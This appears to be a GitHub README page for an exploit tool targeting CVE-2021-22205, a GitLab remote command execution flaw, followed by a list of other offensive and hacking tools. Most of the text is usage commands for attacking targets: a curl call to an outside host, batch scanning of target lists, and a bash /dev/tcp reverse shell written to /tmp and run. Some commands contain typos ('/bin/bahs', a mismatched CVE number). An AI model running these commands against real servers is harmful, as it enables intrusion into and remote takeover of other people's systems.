CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vunl Check

Basic usage

python3 CVE-2021-2205.py

Vuln check

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

command execute

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

batch scan

python3 CVE-2021-2205.py -s true -f target.txt

Reserve Shell

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

CVE-2021-22205& GitLab CE/EE RCE

Related tags

Overview

Vuln Impact

Vuln Product

Environment

Vunl Check

Basic usage

Vuln check

command execute

batch scan

Reserve Shell

Reference

Owner

Al1ex

Scans for Log4j versions effected by CVE-2021-44228

A fast sub domain brute tool for pentesters

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

PwdGen is a Python Tkinter tool for generating secure 16 digit passwords.

Springboot directory scanning

Find exposed API keys based on RegEx and get exploitation methods for some of keys that are found

Recon is a script to perform a full recon on a target with the main tools to search for vulnerabilities.

#whois it? Let's find out!

A brute force tool for password-protected zip file

Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems

A Python wrapper around the OpenSSL library

wsvuls - website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.]

Phoenix Framework is an environment for writing, testing and using exploit code.

C++ fully undetected shellcode launcher

automatically crawl every URL and find cross site scripting (XSS)

Check for breached passwords with k-anonymity

A python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify

Detection And Breaking With Python

An Advanced Local Network IP Scanner, made in python of course!